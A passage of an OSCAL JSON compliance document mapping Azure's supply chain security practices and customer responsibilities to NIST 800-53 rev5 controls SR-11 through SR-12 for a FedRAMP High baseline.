Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"32f2d42a-9266-4544-aae8-101e0d863566","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against supply chain threats as part of a comprehensive, defense-in-breadth information security strategy.","provided-uuid":"f37b4a04-f40a-46e8-8d86-5e3a9ece763c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d4b27c51-a102-4436-b0e3-8ba920c2b433","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11","statements":[{"uuid":"cee2d22d-c279-4c4d-8a93-615f30d99b82","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11_smt.a","by-components":[{"uuid":"544ab420-c424-4900-9fe1-a63350a70d25","export":{"provided":[{"uuid":"bc3d75c5-b1bc-43ae-9f28-33131dbc8e02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"}],"description":"Azure has processes in place to prevent and detect counterfeit components from entering the information system. As preventive measures, Azure must follow the Microsoft corporate procurement process. Azure sources hardware and software only through original equipment manufacturer (OEM) suppliers and their certified distribution partners that have been approved by the procurement process. Within the agreements with suppliers of hardware and software there are security provisions to ensure the security of the supply chain and protection against threats such as counterfeit components. Additionally, for its infrastructure services Azure maintains authoritative lists of approved software through its Definitive Software Library (DSL) as well as IPAK images. This ensures that software and updates are from approved sources. As a detective measure, Azure implements vulnerability scanning for the Azure environment by actively scanning all server operating systems, network devices, web applications, and databases in the Azure inventory with authenticated scans. Risk Protective Services (RPS), of which Anti-Piracy Services (APS) is a part, manages Microsoft's Supply Chain Security program for its traditional Manufacturing and Digital Supply Chain, including, but not limited to: device manufacturing (Xbox, Surface, accessories); software manufacturing both physical and digital, distribution of products, secure print (COA, Xbox Live, Skype, Office cards), digital distribution, OEM, Azure, and more.  The technologies these products utilize, as well as telemetry data on key usage and investigations of abuse, and counterfeit.  All these suppliers are required to adhere to Microsoft policies by contract. APS partners with other teams within Microsoft to insure suppliers are secure both physically and digitally - IRSM (IT), DCU (Digital Crimes Unit), CCR (Cyber Crimes Unit), Global Security (Microsoft assets and people), Azure supply chain, WDG Security (leak prevention and new product introduction and investigations).   APS crosses all lines of business and channels at Microsoft. The Supply Chain Security (SCS) program manages Microsoft's tier 3 program with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program.  SCS manages supplier security requirements, best practices and compliance inspections throughout Microsoft physical and digital supply chains.  The requirements are reviewed annually against industry best practices and updated.  Risk analysis of the Microsoft global supply chain is performed annually. Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the OEM prior to shipment and again at the Microsoft datacenter. Microsoft employs firmware source code guidance, reviews and penetration tests to identify security vulnerabilities at the firmware level. Microsoft capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team utilize coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications."}],"responsibilities":[{"uuid":"f88d5e00-f6d8-482c-98dc-4f9a1072cda0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-019"}],"description":"The customer is responsible for developing and implementing anti-counterfeit policy and procedures in order to detect and prevent counterfeit components.","provided-uuid":"bc3d75c5-b1bc-43ae-9f28-33131dbc8e02"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0777b7d4-4c79-4010-9148-e1c379fbf852","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11_smt.b","by-components":[{"uuid":"ddb38912-1439-4483-9b15-ea4dab0f4026","export":{"provided":[{"uuid":"f0fcfa72-51d9-44dc-855e-73c8b247d8a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"}],"description":"Reports of counterfeit information system components follows the incident handling procedures. In the event a counterfeit incident impacts Azure assets or services requiring customer notification, the Security Response Team coordinates with the service team to notify the customer and USCYBERCOM."}],"responsibilities":[{"uuid":"9b45f455-2c4b-4e68-8ee0-f2e998f2fd5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-020"}],"description":"The customer is responsible for reporting counterfeit information system components to the source of the counterfeit components, customer-defined external reporting organizations, and/or customer-defined personnel/roles.","provided-uuid":"f0fcfa72-51d9-44dc-855e-73c8b247d8a0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a8715dc5-b4bc-4e27-a5ce-04be9fd9bdd8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11.1","statements":[{"uuid":"9c3774be-1f27-457e-ade7-4c4878cc6f1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11.1_smt","by-components":[{"uuid":"0de5629b-c17c-4608-83ba-047768de5bbf","export":{"provided":[{"uuid":"c92d699c-e45d-4cd9-aeff-6d4faca9fd8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"}],"description":"The Microsoft Supply Chain Security program maintains industry-leading quality programs whereby Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization. Personnel supporting the program are trained under the curriculum programs identified in AT control family. All members of software development teams receive appropriate training to stay informed about security basics and recent trends in security. Individuals who develop software programs are required to complete at least one security training course in person or online each year. Security training can help ensure software is created with security in mind and can also help development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education that is appropriate to their needs or products. Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding: * Secure configuration, installation, and operation of the information system; * Effective use and maintenance of security features/functions; and * Known vulnerabilities regarding configuration and use of administrative (i.e., elevated) functions This documentation is stored in each service team's SharePoint site or STRIKE Central and is made available to service team members. Review of relevant documentation is part of initial and ongoing training activities held at least annually."}],"responsibilities":[{"uuid":"2b00a93f-4b43-4d5f-8023-17b837538ca9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-021"}],"description":"The customer is responsible for training personnel to detect counterfeit information system components supporting customer-deployed resources.","provided-uuid":"c92d699c-e45d-4cd9-aeff-6d4faca9fd8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b5aa1f95-eab5-4b19-bbfd-a81e44c00687","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-11.2","statements":[{"uuid":"05699af7-9a76-4f05-9e61-07993c5a053d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-11.2_smt","by-components":[{"uuid":"e561970b-01a8-48ea-9ad3-9e25605b563f","export":{"provided":[{"uuid":"20fb8d9b-1be9-42d1-ad62-31acc310786c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. Datacenter Management (DCM) and Critical Environment (CE) teams implement configuration control for digital media hardware awaiting service or repair and serviced or repaired at Azure datacenters. The digital media hardware changes are tested and documented for investigation purposes. For logical software, Azure service teams deploy configuration control on information system components awaiting service or repair and serviced or repaired. Changes are conducted in a separate development/test environment, are subject to testing with defined pass rates, peer review to enforce separation of duties, and are implemented into production via Safe Deployment Practices (SDP). Changes are documented for investigation purposes."}],"responsibilities":[{"uuid":"13ae2765-3e04-4ddd-82a5-af7c24b9584f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-022"}],"description":"The customer is responsible for maintaining configuration control over customer-controlled information system components awaiting service or repair and serviced or repaired.","provided-uuid":"20fb8d9b-1be9-42d1-ad62-31acc310786c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fb541918-4843-49b2-9e72-841b40b9e0a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-12","statements":[{"uuid":"db4a779c-168f-442b-a8d2-b4e4c45c2c1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-023"},{"name":"control-origination","value":"system-specific"}],"statement-id":"sr-12_smt","by-components":[{"uuid":"73284ffd-fd06-4fe5-a8d8-9f6fffca0259","export":{"provided":[{"uuid":"f5bcf681-507a-4efc-b570-4cca2588b8fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-023"}],"description":"In Azure datacenters , Azure digital media is sanitized using approved tools and in compliance with customer requirements, including NIST Special Publication 800-88 Revision 1 prior to being reused. Non-digital media is not used by Azure in the datacenter environment. All data bearing devices (DBDs) used by Azure are shredded by an approved ITAD Vendor or customer per customer standards on site. No DBDs leave the Azure datacenters . If hardware is considered volatile and deemed returnable to the supplier, it is shipped out via the standard RMA process as outlined in the Sparing and RMA Strategy. For assets requiring destruction, Azure utilizes onsite asset destruction services."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]}]},"back-matter":{"resources":[{"uuid":"21f7e477-4aea-432c-95e0-65b678ecdc89","title":"FedRAMP High Baseline","rlinks":[{"href":"https://raw.githubusercontent.com/OSCAL-Foundation/fedramp-resources/refs/heads/main/baselines/rev5/json/FedRAMP_rev5_HIGH-baseline_profile.json","media-type":"application/oscal+json"}]}]}}}